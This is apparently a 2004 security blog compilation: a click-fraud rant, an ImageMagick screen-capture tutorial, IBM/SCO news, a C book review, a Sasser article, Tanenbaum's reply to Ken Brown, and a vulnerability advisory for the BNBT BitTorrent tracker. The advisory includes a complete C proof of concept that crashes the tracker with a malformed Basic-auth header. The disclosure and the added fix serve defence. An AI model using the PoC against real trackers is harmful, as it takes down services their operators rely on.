It's odd that Google doesn't do anything to block out solicitations to conspire against Google 'Pay for Click' advertisers. But then again Google makes money every time some housewife in India, or Pakistan, or Russia or Brazil clicks on one of their ads... And every bogus click helps bolster Google's stats on 'how effective' Google Clicks are for advertisers.

I know that Google takes the 'scammers' seriously and will attempt to ferret out the blatantly OBVIOUS ones... but they probably are only able to spot the .01% that are so stupidly obvious that they are literally begging to be caught...

I can't wait for the bubble to burst... as the burned advertisers retreat and start looking for more honest methods of bringing their products and services to the attention of potential customers.

Unfortunately in the meantime a good number of legitimate web sites will financially collapse waiting for the advertisers to wake up... A quick look around the security scene will show a number of quite respectable and well known web sites that are not generating any advertising revenue at all. Some of those web sites may not be with us by the Fall of 2004...

And the only sites that will be left to pick up the pieces will be the ones that were scamming the advertisers and falsely generating revenue through bogus clicks.

After all... in countries where the average monthly income is a few hundred dollars per month... you can see how the popularity of bogus ad clickers is growing exponentially.

But as the one chap wrote... the scammers who find ways to cheat the various 'pay for click' advertising schemes have existed from the start of the Internet and they will probably continue to exist years from now...

Well... that is my rant for today ahhahaha....

And as you surf the various web sites, not only the security ones, you can think of this little rant about those 'Google Ads' that may appear in front of you. Give 'em a click... as the ones on the Security web sites are most likely not cheating and not getting paid for hosting those ads... It will drop a few coins into their pockets and it can't be any worse than some housewife in India doing it.

Maybe this topic would be more openly discussed and investigated if they ever found out that the Al Qaeda were the ones profiting and behind the bogus 'pay for click' operations...

And oddly enough... SPAM gets all the real attention, because it clogs up people's email boxes... and yet seldom do people ever do stats that show how many of those SPAMs are somehow tied into some twerp's efforts to force 'click throughs' to a specific web site to garner 'click through pay' for the spammer. Or in other cases, trojans are deployed on victim computers in order to generate a zombie army of 'click through' machines that can be commanded which links to click in order to generate pocket cash for some zombie master. Or worse yet... the number of web site operators that deploy various tricks on their web sites to trick people into clicking these 'pay for click' links.

Ah the seedy underbelly of the Internet... yah gotta love it...

Tee hee...

ARTICLE: Making Screen-Capture Movies

If a picture is worth a thousand words, then how about a thousand pictures
-- or a graphical animation? Getting the message across depends a lot on
the tools at hand. It's one thing to stand in front of a classroom with a
blackboard, a projector, and a room full of PCs, but it's quite another thing describing a set of ideas to multiple people who are standing in front of a
kiosk, in a hall filled with competing noises and distractions. Wouldn't it be
great to create animated screen shots without first taking a course in
multimedia and purchasing expensive development applications? Of course it

The Screen-Shot Movie

Let's set the stage: our objective is to create a screen-shot movie that
demonstrates how to use a certain feature in an application. In addition, we
should be able to provide commentary within the movie to give background as to
what's going on.
Ideally, we can make a movie with tools that don't take long to learn and
use. The technique demonstrated in this article shows how to capture screen
shots in rapid succession. These screen shots are then converted into a single
file that can be read by nothing more complicated than a browser.

The Tools

We need the following tools:

  • The ImageMagick command-line utilities, to create, edit, and convert images from one format to another.

  • xwininfo, the window information utility for X.

  • A small bash script to record multiple screen captures.

How to Use the Tools

Launch the application you want to record. Use xwininfo to
obtain the target window's hexadecimal ID number. In this example, the ID
number, 0x140001d, comes from the fifth line in the output
bernier@wolf:~/tmp/animate$ xwininfo

xwininfo: Please select the window about which you
would like information by clicking the
mouse in that window.
xwininfo: Window id: 0x140001d "making movies.sxw - OpenOffice.org 1.1.0 "
Absolute upper-left X: 4
Absolute upper-left Y: 18
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 920
Height: 630
Depth: 16
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x1400001 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: StaticGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +4+18 -100+18 -100-120 +4-120
-geometry 920x630+4+18

Use the import command to capture the window. If this succeeds,
you'll hear two beeps from the PC's speaker. If you want a frame around the
screen capture, add the -frame switch. By the way, the import
command can capture screens to any file format, but the MIFF format is very
import -window 0x140001d openoffice.miff

View the screen capture with display:
display openoffice.miff

If you prefer a different format, use convert to, well, convert
the image:
convert openoffice.miff openoffice.png

With all of those steps explained, here's a simple bash script to collect the screen captures for our movie. It takes two command-line arguments: the window ID and
the amount of shots to capture:

#!/bin/bash
# A simple bash script to screen capture
# Supply two arguments, the window id and number of captures
if [ $# -ne 2 ]; then
    echo "usage: $0 window_id number_of_captures" >&2
    exit 1
fi
let x=1
# loop until it has captured the number of captures requested
while [ "$x" -le "$2" ]
do
    import -window "$1" "capture$x.miff"
    # uncomment the line below
    # if you want more time in between screen captures
    # sleep 2s
    let x+=1
done

Invoking the script is straightforward. Make it executable, then
./capture.sh w_id no_capt

where w_id is the hexadecimal ID obtained from
xwininfo, and no_capt is the number of screen shots to
Use animate to animate the captured images:
animate -delay 20 *.miff

The delay number controls how much time to wait between the
individual screen captures. The units are in hundredths of a second.
Finally, converting the animated images to a more
convenient, single-file format is accomplished by using the convert utility.
There are several likely formats:
  • MNG is a license free, multi-image file format, similar to PNG but
    with more bells and whistles. This format is not yet widely used, but it is very
    neat and there are plug-ins for all the major browsers.
    convert -delay 20 *.miff capture.mng

  • GIF, you should know.
    convert -delay 20 *.miff capture.gif

  • MPEG encoding requires you to download and compile the mpeg2encode
    utility source code, but it does allow you to add sound.
    convert -delay 20 *.miff capture.mpg

Enhancing a Screen Capture

It's not always enough to replicate a series of keystrokes and pop-up
menus. Sometimes, you need details that help explain what's going on better.
For that matter, it's nice to make a plain screen look fantastic with all sorts
of graphical, special effects. That's where mogrify comes in.
mogrify -fill blue -pointsize 25 -draw 'text 10,20 "Hello World" ' capture1.miff


The above command adds the phrase "Hello World" to the
capture1.miff image. The words will be colored blue, with a
point size of 25. The words are placed relative to the top left corner of the
image in terms of x (10 pixels to the right) and y (20 pixels down).
The montage command makes the additions on a copy of the
original. Remember to use the -geometry switch with the current
window size (for example, -geometry 920x630); otherwise, the copy
will have a size of 120 by 120 pixels.
montage -fill black -pointsize 50 -draw 'text 100,300 "Robert Bernier" ' -geometry 920x630 capture1.miff capture1a.miff

Drawing a box behind the words will make them stand out:
montage -fill yellow -draw 'Rectangle 80,250 400,400' -fill black -pointsize 20 -draw 'text 100,300 "@instruction1.txt"' -geometry 920x630 capture1.miff capture1a.miff

Remember that you read the switches from left to right. Why? Because each
set of options can be changed by the next option to its right. You won't be
able to see the words in this next example because the yellow box covers them,
as drawing text occurs before drawing the colored box:
montage -fill black -pointsize 20 -draw 'text 100,300 "@instruction1.txt"' -fill yellow -draw 'Rectangle 80,250 400,400' -geometry 920x630 capture1.miff capture1a.miff

By the way, did you notice the @instruction1.txt? The
@ token instructs the utility to place the contents of a text
file, instruction1.txt in this case, into the image.

Screen Capture Tips

The best way to figure out what looks good is by experimentation. Here are
a few things I've learned that may save you some time.
  • The more instructions and options on the import command, the longer the capture will take.

  • Do the screen captures using the MIFF file format. Capturing to any other format can slow down the capture process.

  • The screen-shot capture rate depends on the window size.

  • Listen to the beeps; this will give you an idea how quickly or slowly you should navigate through your window.

  • Use the root flag to capture the entire screen of your desktop:
    import -window root capture.miff

  • Identify and rehearse the steps that you want to record. This is known as
    making a storyboard. The
    screen-capturing process will save every action, good and bad, so practice the
    steps before invoking the bash script.

  • Inserting a sleep command inside of the bash script can give you
    much-needed time to prepare the application for the next screen shot without
    feeling rushed.

  • Reviewing each shot after capture helps identify the good and bad images.
    Simplify this tedious operation by using display to load and edit
    an entire series of images with one command.

  • You may have noticed that listing files with numbers doesn't always sort
    the way you want. Here's a shell trick to ensure that the files are never out
    of sequence:
    display capture?.miff capture??.miff

  • Clicking once on a displayed image will put the ImageMagick program into
    editing mode, and clicking the image again will make the menu disappear. The
    editing tools have many of the same options that are available on the command
    line. Pressing the space bar advances to the next image.

  • Improve the flow of your presentation by adjusting the speed and duration
    of the frame rates of your animation. You can do this while converting the
    individual images.

  • Add comments and special effects to the images only after you've
    established their respective animation frame rates. Make a backup of your
    animation first.
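A storyboard-driven driver for the capture pipeline described in this article, added here as an example that is not the article's own script: it names frames with zero-padded numbers so a plain glob sorts in capture order, waits the per-step time from the storyboard before each shot, captions each frame with mogrify and assembles the movie with convert. The command syntax is the import/mogrify/convert usage shown above; the storyboard format (seconds|caption per line) and the injectable execute/wait hooks are assumptions of this example.

```python
import subprocess
import time

# Constructed storyboard (an assumed format, one line per step): seconds to wait | caption for that frame
STORYBOARD = """\
2|Open the File menu
3|Choose Save As...
2|Type the file name and press Enter
"""


def parse_storyboard(text):
    """Return a list of (seconds, caption); blank lines and '#' comments are skipped."""
    steps = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        secs, _, caption = line.partition("|")
        steps.append((float(secs), caption.strip()))
    return steps


def frame_name(index, width=3):
    """capture001.miff, capture002.miff, ... so capture10 no longer sorts before capture2."""
    return "capture%0*d.miff" % (width, index)


def capture_cmd(window_id, frame):
    # the article's import invocation; MIFF keeps the capture fast
    return ["import", "-window", window_id, frame]


def caption_cmd(frame, caption, x=10, y=20):
    # the article's mogrify text overlay; double quotes are dropped so the draw string stays well formed
    text = caption.replace('"', "")
    return ["mogrify", "-fill", "blue", "-pointsize", "25",
            "-draw", 'text %d,%d "%s"' % (x, y, text), frame]


def assemble_cmd(frames, output, delay=20):
    # delay is in hundredths of a second, as for animate
    return ["convert", "-delay", str(delay)] + list(frames) + [output]


def run(window_id, steps, output="capture.mng", execute=None, wait=time.sleep):
    """Capture each storyboard step, caption it and assemble the movie.
    execute/wait can be swapped out so the command plan can be inspected without ImageMagick."""
    if execute is None:
        execute = lambda cmd: subprocess.run(cmd, check=True)
    frames = []
    for i, (secs, caption) in enumerate(steps, start=1):
        wait(secs)                      # time to set the window up for this step
        frame = frame_name(i)
        execute(capture_cmd(window_id, frame))
        if caption:
            execute(caption_cmd(frame, caption))
        frames.append(frame)
    execute(assemble_cmd(frames, output))
    return frames


if __name__ == "__main__":
    import sys
    # usage: script.py <window id from xwininfo> [output file]
    run(sys.argv[1], parse_storyboard(STORYBOARD),
        sys.argv[2] if len(sys.argv) > 2 else "capture.mng")
```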

About the Demo

Either download the demo or run it directly from your browser using
animate. You can also convert it into another file format to
better suit your hardware. Be patient. MNG files must be first uncompressed
and then cycled once before they will behave properly; this can take up to a
minute. However, if you convert it to a GIF, the file will be larger, but it will respond
instantly in the browser. Converting the file to an MPEG permits play with any
multimedia application, such as mplayer, without any startup time.
Developing the small screen-capture movie
for this article made it painfully obvious to me that you should exercise
discretion when choosing your file format. I experimented with GIFs, MPGs, and
MNGs. For example, the resulting uncompressed GIF was 14MB. (ImageMagick
binaries do not use the proprietary compression algorithm unless you enable
that option and recompile.) The MPG was 4.6MB. The MNG was the smallest at
500K. The fancy screen-capture demo was substantially
larger, with the GIF at 26MB, the MPG at 6.7MB, and the MNG again the smallest
at 4.7MB. However it was interesting to note that converting the fancy movie
MNG to PCX files and then converting it back reduced the size to 1.6MB, 65%
The MNG format is clearly superior to GIF, but it is not very well
supported, and takes quite a long time to decompress before it's ready to play.
Mozilla's MNG plug-in failed to bring up the small demo. The ImageMagick
utility animate worked fine. KDE's Konqueror could only run the
small demo, where an HTML tag embedded the MNG file with the
<src> tag.
The GIF version of the demos played well in animate, Mozilla,
and Konqueror.
Another factor to consider is that files such as GIF and MNG don't really
"stream," so players need to load the entire file into RAM before you can see
it. Large graphics may consume too much RAM, crashing your application. One
easy solution is to enlarge the virtual memory by using a swap file. This issue
may also come up when using convert.
MPG is a good choice when resources are at a premium and it's not possible
to add a swap file. You may need to experiment with the convert options
to prevent color loss, though.
animate is good because the presentation is so exact and easy
to control. Viewing GIF format guarantees that any browser can read it fast. Beware,
though -- both of these formats are RAM hungry.


ImageMagick is a very sophisticated graphics manipulation package. This
article has covered only its barest capabilities. Anybody who decides to use
it as a development platform can increase his or her productivity by using
scripts. ImageMagick has an API with a complete set of language bindings for over 16 languages,
including Perl, Java, C, C++, and Cold Fusion.
For those who follow the articles of a certain FreeBSD girl, you can also
do some very interesting things such as Hide Secrets with Steganography inside of your movie.
Several Linux multimedia development applications are available. Many of them have taken inspiration from ImageMagick.


Robert Bernier
currently teaches multimedia technologies in the journalism department at Algonquin College in Ottawa, and works as system and network administrator at a local startup company.

My rating on this article is 7/10

Although this article gives you a step-by-step approach on how to capture a simple movie of the actions you are taking, I have had very limited luck with this method. When I used Windows there was a program called camfiesta that was much superior to this method. It is, however, the first time that such a thing has been discussed for Linux and I believe there would be plenty of how-tos as well as programs from where that came from.

ARTICLE: IBM slams 'grandiose' SCO, asks for whole farce to be called off

IBM has filed new documents in its legal dispute with the SCO Group, accusing SCO of having no evidence to back up its copyright infringement claims and asking the judge to throw a major component of the case out of court.
"For more than a year, SCO has made far-reaching claims about its right to preclude IBM's (and everyone else's) Linux activities," wrote IBM in documents filed with the District Court for Utah. "Despite SCO's grandiose descriptions of its alleged evidence of IBM's infringement, SCO now effectively concedes that it has none."
SCO has been unable to provide any evidence of copyright infringement during the discovery phase of the trial and the court should therefore render a summary judgement against SCO, IBM's filings say.
In March 2003, SCO filed a multibillion dollar lawsuit against IBM, accusing it of violating SCO's Unix intellectual property. SCO accused IBM of unfair competition, breach of contract, and of violating SCO's trade secrets. In late February this year, it dropped the trade secret allegations in the case, but added a claim that IBM had violated SCO's Unix copyright.
A few weeks after the trade secret claims were dropped, IBM sought a declaratory judgement in the case, a move that opened the possibility of a quick ruling against SCO. Lawyers following the dispute saw this as a sign of growing confidence on IBM's part.
By seeking a declaratory judgement, IBM was showing that it had not found any evidence to back up SCO's claims, said Jeff Norman, an intellectual property partner with the Chicago law firm Kirkland & Ellis. Because the copyright claims form the crux of SCO's case, this week's filing for a summary judgement creates the possibility that the dispute could essentially be over in a matter of months, he said.
"IBM is saying to SCO: 'As a matter of law you're playing this so weak that no reasonable jury could find in your favor'," Norman said. "They must think that they have a pretty good chance of winning the motion, or you wouldn't bring it."
This week's filings could also force SCO to provide more compelling evidence of copyright violations, said David Byer, a partner with the patent and intellectual property group at Boston's Testa, Hurwitz & Thibeault. "It is another way to try to focus the court on the evidentiary questions that have been battled about since day one, meaning who is going to produce what when," he said. "SCO needs to respond to this. If they don't respond appropriately, the case can get thrown out."
SCO is likely to produce more evidence to support its claims, said Blake Stowell, an SCO spokesman. On 19 April, IBM turned over 232 versions of its AIX and Dynix Unix source code as well as internal documents and memos from executives, he said. "Our lawyers are still going through much of the evidence IBM turned over as part of the discovery process. I'm confident that there is still other evidence that will come forward in order for us to be able to prove those claims," Stowell said.
Complicating matters for SCO is the fact that Linux vendor Novell also claims to own copyright to the Unix source code. SCO has sued Novell for slander in connection with this claim.

Friday, May 21, 2004

--[ Book Review: Sams Teach Yourself C in 21 Days, 6th edition

By: Bradley Jones and Peter Aitken

# Paperback: 960 pages ; Dimensions (in inches): 2.12 x 9.06 x 7.38
# Publisher: SAMS; 6th edition (September 25, 2002)
# ISBN: 0672324482

This book was another great build and I thought it gave me a better understanding of some of the dull spots that I did not get from the C Primer Plus. The book is well planned out and has a great structure; there are 21 chapters (days) in total about C and an extra 7 chapters about some other languages based on C (Java, C#, and C++). The following is the list of the C chapters:

# Day 1 - Getting Started with C
# Day 2 - The Components of a C Program
# Day 3 - Storing Data: Variables and Constants
# Day 4 - Statements, Expressions, and Operators
# Day 5 - Functions: The Basics
# Day 6 - Basic Program Control
# Day 7 - Fundamentals of Input and Output
# Day 8 - Using Numeric Arrays
# Day 9 - Understanding Pointers
# Day 10 - Characters and Strings
# Day 11 - Structures
# Day 12 - Understanding Variable Scope
# Day 13 - Advanced Program Control
# Day 14 - Working with the Screen, Printer, and Keyboard
# Day 15 - Pointers: Beyond the Basics
# Day 16 - Using Disk Files
# Day 17 - Manipulating Strings
# Day 18 - Getting More from Functions
# Day 19 - Exploring the C Function Library
# Day 20 - Working with Memory
# Day 21 - Advanced Compiler Use

As you see, the book will take you from a newbie programmer to an intermediate. There are, however, many downsides to this book: there are many typos that I was able to spot, and there are no answers to some of the questions. Another thing that is lacking in the book is that it does not have any reference to the C99 standard, which means it does not adhere to the most recent standard published. I really enjoyed doing the Bug Busters section of the book and would like to have many more in the next editions of the book.
The book is 960 pages long but day 21 ends at page 626; the following 7 bonus chapters span from page 627 to page 781, then the appendixes go from page 783 to 893. The book is very easy to read and should take you about 5 days to read if you really want to learn fast, or you could go the slow pace of the book and learn it in 21 days. Of course it is actually ridiculous to believe that you are going to learn the language in just 21 days, so the title is a little bit of a lie, although you will gain understanding about some of the language features; still, this is not the whole.

My rating on this book is 8/10

Other reviews done on the book by others:
ACCU Review: Teach Yourself C Programming in 21 Days by Peter Aitkin & Bradley Jones
Barnes and Noble

Teach Yourself Programming in Ten Years

ARTICLE: Mitnick: feel foolish if Sasser hit you

Bill Goodwin
Teenage hackers shame IT industry again
Schoolboy Sven Jaschan has been arrested for releasing the Sasser worm, but law agencies are clueless as to how to stop many others like him perpetrating the same crime
The arrest of an 18-year-old schoolboy accused of unleashing Sasser and a series of 28 Netsky worms was both a relief and source of frustration for IT professionals.
Despite years of heavy spending on IT security, it is clear that stereotypical teenage hackers can still cause expense and embarrassment to business IT users.
The Sasser worm, which exploited a vulnerability in Microsoft Windows, hit high-profile targets, including the UK Coastguard Service, British Airways and American Express, and thousands of small businesses.
Variants of the Netsky worm are still creating serious difficulties for unprotected computer systems months after they were first released.
The arrest of Sven Jaschan at his mother's home in Waffensen, Germany, followed an international investigation. But his swift apprehension has left companies and law enforcement agencies wondering whether anything can be done to deter youngsters from being drawn to computer crime.
Last week, police started analysing computer equipment seized from Jaschan and a network of friends around his home town, who are believed to have collaborated to develop and distribute the worms.
"He was caught by his ego and partly his arrogance," said one investigator involved in the case. "Virus writers are motivated by boredom and a desire to appear to have some impact or significance on the world and they do it to get the rush of seeing their code listed on the anti-virus top 10."
His arrest followed a tip-off from acquaintances who were anxious to share the £250,000 bounty offered by Microsoft.
Jaschan bears all the hallmarks of a typical virus writer. He was shy and withdrawn with only one passionate interest: computers. He was studying informatics at school and hoped to go on to study computing at university.
Like many virus writers, Jaschan was probably motivated by a need for recognition, said David Wall, professor of criminal justice and information technology at Leeds University.
"The common thread among many hackers is introversion, a will to be linked to the world and to show the world they are there, while being shy when it comes to face-to-face contact," he said. "For many it is a question of esteem. They sparkle on the internet where they cannot in real life."
Graham Cluley, chief virus technologist at Sophos, said, "It is about showing off to friends and computer geeks. There are criminal writers, but it is more likely this guy was doing it to feel cool."
The need for intellectual challenge was probably another driving force for Jaschan.
"Virus writers have imaginations that lend themselves to complex mathematical problems. Like a lot of deviant activities, part of their appeal is being able to do something that is not condoned by others," said Wall.
Businesses and the police have long tried to find ways to prevent children turning into computer criminals. The National Hi-Tech Crime Unit said it was in talks with the Home Office about educating young people in responsible computer use in schools.
"Children need to be educated from an early age on how to look after themselves online. That is one of the best ways to educate them to protect others," said Philip Virgo, director of Eurim, the industry parliamentary group.
"Teenagers writing worms is rather akin to teenagers playing arson games. Teaching children not to play with matches is a good idea, but it is no substitute for removing the vulnerabilities."
Mitnick: feel foolish if Sasser hit you
Virus writers come low down in the pecking order of computer hackers, said Kevin Mitnick, once the world's most notorious hacker.
In an interview with Computer Weekly, Mitnick, now working as a computer security consultant and author, said Sven Jaschan's technical skills were nothing special. He was amazed that so many businesses fell victim to a worm that in his view was relatively easy to prevent.
"He was no great technical expert. There was a published vulnerability and he took his worm and used his exploit code to be able to propagate it in the many systems that Sasser touched," he said.
Businesses should feel embarrassed if the worm hit them, Mitnick said. "Companies should have known better - you don't leave port 445 open to a hostile network. It is foolish."
Mitnick said he understood Jaschan's obsession with computers. "I was a computer enthusiast myself and I spent the great majority of my time hacking."
Jaschan's arrest and police raids on his collaborators are unlikely to deter youngsters in the future, he added. "People doing this stuff do not assess the risk of being caught. They operate under the illusion of vulnerability."

Original article: http://www.computerweekly.com/articles/article.asp?liArticleID=130593&liArticleTypeID=20&liCategoryID=2&liChannelID=22&liFlavourID=1&sSearch=&nPage=1

SP Research Labs Advisory x12

BNBT BitTorrent Tracker Denial Of Service

Beta 7.5 Release 2 and prior versions


Date Released - 5.21.2004

Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond the original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU Lesser
General Public License (LGPL).


A specially crafted HTTP GET request containing the header 'Authorization: Basic A==' will cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous versions are also affected by
this vulnerability. The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
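The advisory does not say what Util_DecodeHTTPAuth does with the token, but 'A==' is not well-formed base64 (data characters come in groups of four), so a decoder that trusts the shape of its input is a plausible cause; that is an assumption, not a statement about BNBT's source. The following C++ is an added example, not BNBT's code, of a strict Basic-auth decoder that rejects such input before touching any buffer (function names are my own):

```cpp
#include <cctype>
#include <cstdint>
#include <string>

// Value of one base64 alphabet character, or -1 if it is not in the alphabet.
static int b64Value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

// Strict base64 decode. Returns false (and leaves out empty) for anything that
// is not well-formed: length not a multiple of 4, characters outside the
// alphabet, or '=' anywhere except the last one or two positions. Every index
// used is covered by the length test, so malformed input such as "A==" can
// never cause an out-of-range read or write.
bool strictBase64Decode(const std::string &in, std::string &out) {
    out.clear();
    if (in.empty() || in.size() % 4 != 0) return false;
    for (size_t i = 0; i < in.size(); i += 4) {
        int v[4];
        int pad = 0;
        for (int j = 0; j < 4; ++j) {
            char c = in[i + j];
            if (c == '=') {
                // Padding is only legal in the final group, positions 2 and 3.
                if (i + 4 != in.size() || j < 2) return false;
                ++pad;
                v[j] = 0;
            } else {
                if (pad) return false;          // data after padding
                v[j] = b64Value(c);
                if (v[j] < 0) return false;     // not in the alphabet
            }
        }
        uint32_t bits = (uint32_t(v[0]) << 18) | (uint32_t(v[1]) << 12) |
                        (uint32_t(v[2]) << 6) | uint32_t(v[3]);
        out.push_back(static_cast<char>((bits >> 16) & 0xFF));
        if (pad < 2) out.push_back(static_cast<char>((bits >> 8) & 0xFF));
        if (pad < 1) out.push_back(static_cast<char>(bits & 0xFF));
    }
    return true;
}

// Parse the value of an HTTP Authorization header ("Basic <token>") into
// user and password. Returns false for any scheme other than Basic, a token
// that fails strict decoding, a decoded string without ':' (RFC 2617 requires
// "user:password"), or control bytes in the credentials. Hypothetical
// replacement for a routine like BNBT's Util_DecodeHTTPAuth; not BNBT code.
bool decodeHTTPBasicAuth(const std::string &header, std::string &user, std::string &password) {
    user.clear();
    password.clear();
    const std::string scheme = "basic ";
    if (header.size() <= scheme.size()) return false;
    for (size_t i = 0; i < scheme.size(); ++i)          // scheme name is case-insensitive
        if (std::tolower(static_cast<unsigned char>(header[i])) != scheme[i]) return false;
    std::string token = header.substr(scheme.size());
    while (!token.empty() && (token.back() == '\r' || token.back() == '\n' || token.back() == ' '))
        token.pop_back();                                // strip line ending / trailing blanks
    std::string decoded;
    if (!strictBase64Decode(token, decoded)) return false;
    size_t colon = decoded.find(':');
    if (colon == std::string::npos) return false;
    for (unsigned char ch : decoded)
        if (ch < 0x20 || ch == 0x7F) return false;       // no NUL/control bytes in credentials
    user = decoded.substr(0, colon);
    password = decoded.substr(colon + 1);
    return true;
}
```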


Attached to this advisory is a very basic PoC which only causes the BNBT server to crash.

Tested on:
WindowsXP SP1

peace out,


PoC to crash the server

/* BNBT BitTorrent Tracker Denial Of Service

   Beta 7.5 Release 2 and prior versions

   The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

   Coded and Discovered by:
   .:sp research labs:.

   This PoC will only DoS the server to verify if it is vulnerable.
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* Request carrying the malformed Basic credentials described above */
char exploit[] =
    "GET / HTTP/1.0\r\n"
    "Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port, bufsize;
    SOCKET mysocket;

    if (argc < 2) {
        printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n\r\n");
        printf("Usage:\r\n %s target [targetport] (default is 6969)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        return 1;
    }

    /* WSAStartup returns a nonzero error code on failure, never a negative value */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];
    port = 6969;

    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 1024;                 /* accepted for compatibility; not used below */
    if (argc >= 4) bufsize = atoi(argv[3]);
    (void)bufsize;

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET) {
        printf("Socket error!\r\n");
        return 1;
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL) {
        printf("Resolve of %s failed\n", argv[1]);
        return 1;
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock))) {
        printf("Couldn't connect to host.\n");
        return 1;
    }

    printf("Sending Payload...\n");
    if (send(mysocket, exploit, sizeof(exploit) - 1, 0) == -1) {
        printf("Error Sending the Exploit Payload\r\n");
        return 1;
    }

    printf("Payload has been sent! Check if the webserver is dead.\r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}

Ken Brown's Motivation, Release 1.2


On 20 May 2004, I posted a statement refuting the claim of Ken Brown, President of the Alexis de Tocqueville Institution, that Linus Torvalds didn't write Linux. My statement was mentioned on Slashdot, Groklaw, and many other Internet news sites. This attention resulted in over 150,000 requests to our server in less than a day, which is still standing despite yesterday being a national holiday with no one there to stand next to it saying "You can do it. You can do it." Kudos to Sun Microsystems and the folks who built Apache. My statement was mirrored all over the Internet, so the number of true hits to it is probably a substantial multiple of that. There were also quite a few comments at Slashdot, Groklaw, and other sites, many of them about me. I had never engaged in remote multishrink psychoanalysis on this scale before, so it was a fascinating experience.
The Brown Book

I got an advance copy of Ken Brown's book. I think it is still under embargo, so I won't comment on it. Although I am not an investigative reporter, even I know it is unethical to discuss publications still under embargo. Some of us take ethics more seriously than others. So I won't even reveal the title. Let's call it The Brown Book. There is some precedent for nicknaming books after colors: The International Standard for the CD-ROM (IS 10149) is usually called The Red Book.

Suffice it to say, there is a great deal to criticize in the book. I am sure that will happen when it is published. I may even help out.

Brown's Motivation

What prompted me to write this note today is an email I got yesterday. Actually, I got quite a few :-) , most of them thanking me for the historical material. One of yesterday's emails was from Linus, in response to an email from me apologizing for not letting him see my statement in advance. As a matter of courtesy, I did try but I was using his old transmeta.com address and didn't know his new one until I got a very kind email from Linus' father, a Finnish journalist.

In his email, Linus said that Brown never contacted him. No email, no phone call, no personal interview. Nothing. Considering the fact that Brown was writing an explosive book in which he accused Linus of not being the author of Linux, you would think a serious author would at least confront the subject with the accusation and give him a chance to respond. What kind of a reporter talks to people on the periphery of the subject but fails to talk to the main player?

Why did Brown fly all the way to Europe to interview me and (according to an email I got from his seat-mate on the plane) one other person in Scandinavia, at considerable expense, and not at least call Linus? Even if he made a really bad choice of phone company, how much could that cost? Maybe a dollar? I call the U.S. all the time from Amsterdam. It is less than 5 cents a minute. How much could it cost to call California from D.C.?

From reading all the comments posted yesterday, I am now beginning to get the picture. Apparently a lot of people (still) think that I 'hate' Linus for stealing all my glory (see below for more on this). I didn't realize this view was so widespread. I now suspect that Brown believed this, too, and thought that I would be happy to dump all over Linus to get 'revenge.' By flying to Amsterdam he thought he could dig up dirt on Linus and get me to speak evil of him. He thought I would back up his crazy claim that Linus stole Linux from me. Brown was wrong on two counts. First, I bear no 'grudge' against Linus at all. He wrote Linux himself and deserves the credit. Second, I am really not a mean person. Even if I were still angry with him after all these years, I wouldn't choose some sleazy author with a hidden agenda as my vehicle. My home page gets 2500 hits a week. If I had something to say, I could put it there.

When The Brown Book comes out, there will no doubt be a lot of publicity in the mainstream media. Any of you with contacts in the media are actively encouraged to point reporters to this page and my original statement to provide some balance. I really think Brown's motivation should come under scrutiny. I don't believe for a nanosecond that Brown was trying to do a legitimate study of IP and open source or anything like that. I think he was trying to make the case the people funding him (which he refused to disclose to me despite my asking point blank) wanted to have made. Having an institution with an illustrious-sounding name make the case looks better than having an interested party make the case.
Clearing Up Some Misconceptions

I would like to close by clearing up a few misconceptions and also correcting a couple of errors. First, I REALLY am not angry with Linus. HONEST. He's not angry with me either. I am not some kind of "sore loser" who feels he has been eclipsed by Linus. MINIX was only a kind of fun hobby for me. I am a professor. I teach and do research and write books and go to conferences and do things professors do. I like my job and my students and my university. If you want to get a masters there, see my home page for information. I wrote MINIX because I wanted my students to have hands-on experience playing with an operating system. After AT&T forbade teaching from John Lions' book, I decided to write a UNIX-like system for my students to play with. Since I had already written two books at this point, one on computer architecture and one on computer networks, it seemed reasonable to describe the system in a new book on operating systems, which is what I did. I was not trying to replace GNU/HURD or Berkeley UNIX. Heaven knows, I have said this enough times. I just wanted to show my students and other students how you could write a UNIX-like system using modern technology. A lot of other people wanted a free production UNIX with lots of bells and whistles and wanted to convert MINIX into that. I was dragged along in the maelstrom for a while, but when Linux came along, I was actually relieved that I could go back to professoring. I never really applied for the position of King of the Hackers and didn't want the job when it was offered. Linus seems to be doing excellent work and I wish him much success in the future.

